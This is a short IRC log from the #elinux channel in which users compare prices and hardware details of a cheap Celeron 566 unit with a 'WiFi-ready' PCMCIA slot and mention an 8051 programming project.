23:05.48pattiejaplus, they're selling the unit that only has 1 20GB HDD and a PCMCIA slot (empty of course) which is "WiFi-ready"  Ooooh!
23:05.57kergothhehe
23:06.04pattiejathe Wireless network adapter is extra
23:06.46pattiejathe salesman didn't really know how long they would be able to carry the model and I suppose it's really up to how long/how many Celeron 566's Intel is going to continue to make
23:06.51kergothI ended up picking one up off ebay, new, w/ 2 20gb for $250. course tthat doesnt help you tryiong to use them for a customer.. but fyi thats what they run for amongst individuals
23:06.59pattiejathat and whether the CPU is embedded on the board or replaceable
23:07.12pattiejainteresting
23:07.21kergothhmm, I'll open mine up when i receive it and let you know
23:07.23pattiejaTiger's got 'em for $45 more
23:07.33pattieja294.99 or similar
23:09.19pattiejakergoth: I'd really appreciate it.  :)
23:11.26*** join/#elinux TomW (tom@24.229.147.16)
23:12.17TomWsorphin: I'm awake again.  :)
23:12.46TomWsorphin: one more 8051 program to go and then I can play with WebPal!
23:20.22*** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com)
23:27.39*** join/#elinux mastermnd (~mastermnd@h004854622ae6.ne.client2.attbi.com)
23:54.10sieveg'night all

Generated by irclog2html.pl by Jeff Waugh - find it at freshmeat.net! Modified by Tim Riker to work with blootbot logs, split per channel, etc.